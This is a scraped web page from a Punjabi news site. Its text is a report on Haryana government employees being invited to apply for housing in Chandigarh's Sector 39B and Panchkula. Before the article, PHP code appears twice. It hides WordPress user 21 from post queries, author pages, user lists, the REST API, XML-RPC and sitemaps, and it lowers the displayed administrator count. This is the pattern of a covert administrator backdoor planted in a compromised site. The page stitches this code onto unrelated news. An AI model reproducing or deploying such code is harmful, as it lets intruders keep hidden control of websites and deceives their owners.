add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਕਰਮਚਾਰੀਆਂ ਤੋਂ ਸੈਕਟਰ 39ਬੀ ਅਤੇ ਪੰਚਕੂਲਾ ਵਿਚ ਮਕਾਨਾਂ ਲਈ ਬਿਨੈ ਮੰਗੇ - Press Ki Taquat
No Result
View All Result
ਚੰਡੀਗੜ, 19 ਫਰਵਰੀ (ਪ੍ਰੈਸ ਕਿ ਤਾਕਤ ਬਿਊਰੋ) : – ਹਰਿਆਣਾ ਸਰਕਾਰ ਦੇ ਕਰਮਚਾਰੀਆਂ ਤੋਂ ਚੰਡੀਗੜ ਸਥਿਤ ਸੈਕਟਰ 39ਬੀ ਵਿਚ ਹਰਿਆਣਾ ਸਰਕਾਰ ਦੇ ਰਿਹਾਇਸ਼ ਟਾਇਪ 3, ਟਾਇਪ-1 ਅਤੇ ਟਾਇਪ-4 ਦੇ ਵੰਡ ਲਈ ਬਿਨੈ ਮੰਗੇ ਹਨ| ਸਾਰੇ ਪਾਤਰ ਕਰਮਚਾਰੀਆਂ ਦੇ ਬਿਨੈ ਜਮਾਂ ਕਰਵਾਉਣ ਦੀ ਆਖਰੀ ਮਿਤੀ 10 ਮਾਰਚ, 2020 ਹੈ|
ਇਸ ਸਬੰਧ ਵਿਚ ਜਾਣਕਾਰੀ ਦਿੰਦੇ ਹੋਏ ਰਿਹਾਇਸ਼ ਵੰਡ ਕਮੇਟੀ, ਹਰਿਆਣਾ, ਚੰਡੀਗੜ ਦੇ ਬੁਲਾਰੇ ਨੇ ਦਸਿਆ ਕਿ ਇਸ ਬਾਰੇ ਵਿਚ ਮੁੱਖ ਸਕੱਤਰ, ਚੰਡੀਗੜ ਅਤੇ ਪੰਚਕੂਲਾ ਸਥਿਤ ਸਾਰੇ ਵਿਭਾਗ ਮੁੱਖੀ, ਹਰਿਆਣਾ ਸਿਵਲ ਸਕੱਤਰੇਤ ਦੇ ਪ੍ਰਸ਼ਾਸਨਿਕ ਅਧਿਕਾਰੀ, ਚੰਡੀਗੜ, ਸੈਕਟਰ 17 ਸਥਿਤ ਮਿੰਨੀ ਸਕੱਤਰੇਤ ਦੇ ਅੰਡਰ ਸਕੱਤਰ (ਮਾਲੀਆ), ਪੰਚਕੂਲਾ ਦੇ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ, ਪੰਚਕੂਲਾ ਦੇ ਵਧੀਕ ਜਿਲਾ ਤੇ ਸੈਸ਼ਨ ਜੱਜ, ਹਰਿਆਣਾ ਲੋਕ ਨਿਰਮਾਣ ਵਿਭਾਗ, ਚੰਡੀਗੜ ਸਰਕਲ ਦੇ ਸੁਪਰਡੈਂਟ ਇੰਜੀਨੀਅਰ ਅਤੇ ਪੰਜਾਬ ਤੇ ਹਰਿਆਣਾ ਹਾਈ ਕੋਰਟ, ਚੰਡੀਗੜ ਦੇ ਰਜਿਸਟਰਾਰ ਨੂੰ ਪੱਤਰ ਲਿਖਿਆ ਹੈ|
ਉਨਾਂ ਦਸਿਆ ਕਿ ਪੱਤਰ ਅਨੁਸਾਰ ਪਾਤਰ ਕਰਮਚਾਰੀ ਤੋਂ ਮਤਲਬ ਹੈ ਕਿ ਹਰਿਆਣਾ ਸਰਕਾਰ ਦੇ ਚੰਡੀਗੜ ਸਥਿਤ ਦਫਤਰ ਵਿਚ ਰੈਗੂਲਰ ਆਧਾਰ ‘ਤੇ ਕਰਮਚਾਰੀ ਹੋਣਾ ਚਾਹੀਦਾ ਹੈ ਅਤੇ ਇਸ ਵੰਡ ਲਈ ਸਮੇਂ-ਸਮੇਂ ‘ਤੇ ਜਾਰੀ ਦਿਸ਼ਾ-ਨਿਰਦੇਸ਼ਾ ਅਨੁਸਾਰ ਪੰਚਕੂਲਾ ਅਤੇ ਸੈਕਟਰ 39ਬੀ ਵਿਚ ਸਥਿਤ ਹਰਿਆਣਾ ਸਰਕਾਰ ਦੇ ਰਿਹਾਇਸ਼ ਦੀ ਵੰਡ ਲਈ ਪੰਚਕੂਲਾ ਅਤੇ ਚੰਡੀਗੜ ਵਿਚ ਸਥਿਤੀ ਬੋਰਡ, ਨਿਗਮਾਂ ਅਤੇ ਆਜਾਦ ਸੰਸਥਾਨਾਂ ਵਿਚ ਡੈਪੂਟੇਸ਼ਨ ‘ਤੇ ਗਏ ਕਰਮਚਾਰੀ ਵੀ ਪਾਤਰ ਹੋਣਗੇ|
ਉਨਾਂ ਦਸਿਆ ਕਿ ਯੂ.ਟੀ. ਪ੍ਰਸ਼ਾਸਨ ਵੱਲੋਂ ਚੰਡੀਗੜ ਵਿਚ ਜੇਕਰਾ ਹਰਿਆਣਾ ਸਰਕਾਰ ਦੇ ਕਰਮਚਾਰੀਆਂ ਨੂੰ ਪਹਿਲਾਂ ਤੋਂ ਹੀ ਸਰਕਾਰੀ ਰਿਹਾਇਸ਼ ਵੰਡ ਕੀਤੀ ਗਈ ਹੈ ਤਾਂ ਉਹ ਚੰਡੀਗੜ ਅਤੇ ਪੰਚਕੂਲਾ ਵਿਚ ਹਰਿਆਣਾ ਸਰਕਾਰ ਦੇ ਸਰਕਾਰੀ ਰਿਹਾਇਸ਼ ਲਈ ਪਾਤਰ ਨਹੀਂ ਹੋਵੇਗਾ| ਬੋਰਡ, ਨਿਗਮਾਂ ਅਤੇ ਆਜਾਦ ਸੰਸਥਾਨਾਂ ਦੇ ਕਰਚਮਾਰੀ ਇੰਨਾਂ ਰਿਹਾਇਸ਼ਾਂ ਦੇ ਵੰਡ ਲਈ ਪਾਤਰ ਨਹੀਂ ਹੋਵੇਗਾ|
ਉਨਾਂ ਦਸਿਆ ਕਿ ਟਾਇਪ-1 ਅਤੇ ਟਾਇਪ-4 ਦੀ ਰਿਹਾਇਸ਼ ਲਈ ਪਾਤਰ ਕਰਮਚਾਰੀ ਦੇ ਬਿਨੈ ਸਬੰਧਤ ਵਿਭਾਗ ਮੁੱਖੀ ਜਾਂ ਡਰਾਇੰਗ ਐਂਡ ਡਿਸਬਰਸਿੰਗ ਅਧਿਕਾਰੀ ਵੱਲੋਂ 1 ਜਨਵਰੀ, 2020 ਤਕ ਤਨਖਾਹ ਤਸਦੀਕ ਹੋਣੀ ਚਾਹੀਦੀ ਹੈ ਅਤੇ ਉਸ ਦੀ ਮੂਲ ਤਨਖਾਹ ਦੀ ਰੇਂਜ 35400 ਰੁਪਏ ਤਕ ਹੋਵੇ| ਇਸ ਤਰਾਂ, ਟਾਇਪ-4 ਦੀ ਰਿਹਾਇਸ਼ ਲਈ ਪਾਤਰ ਕਰਮਚਾਰੀ ਦਾ ਬਿਨੈ ਸਬੰਧਤ ਵਿਭਾਗ ਮੁੱਖੀ ਜਾਂ ਡਰਾਇੰਗ ਐਂਡ ਡਿਸਬਰਸਿੰਗ ਅਧਿਕਾਰੀ ਵੱਲੋਂ 1 ਜਨਵਰੀ, 2020 ਤਕ ਤਨਖਾਹ ਤਸਦੀਕ ਹੋਣੀ ਚਾਹੀਦੀ ਹੈ ਅਤੇ ਉਸ ਦਾ ਮੂਲ ਤਨਖਾਹ ਦੀ ਰੇਂਜ 44901 ਰੁਪਏ ਤੋਂ 56100 ਰੁਪਏ ਤਕ ਹੋਵੇ|
ਬੁਲਾਰੇ ਨੇ ਦਸਿਆ ਕਿ ਅਜਿਹੇ ਸਾਰੇ ਪਾਤਰ ਕਰਮਚਾਰੀ www.haryanapwd.gov.in ਵੈਬਸਾਇਟ ‘ਤੇ ਜਾ ਕੇ ਬਿਨੈ ਫਾਰਮ ਡਾਊਨ ਲੋਡ ਕਰ ਸਕਦੇ ਹਨ| ਬਿਨੈ ਫਾਰਮ ਸਕੱਤਰ, ਰਿਹਾਇਸ਼ ਵੰਡ ਕਮੇਟੀ, ਹਰਿਆਣਾ, ਨਿਰਮਾਣ ਸਦਨ, ਪਲਾਟ ਨੰਬਰ 1, ਸੈਕਟਰ 33ਏ, ਚੰਡੀਗੜ ਦਫਤਰ ਵਿਚ ਸਵੇਰੇ 11:00 ਵਜੇ ਤੋਂ ਦੁਪਹਿਰ 12:00 ਵਜੇ ਵਿਚਕਾਰ ਜਮਾਂ ਕਰਵਾਏ ਜਾ ਸਕਦੇ ਹਨ|
Post Views: 140
No Result
View All Result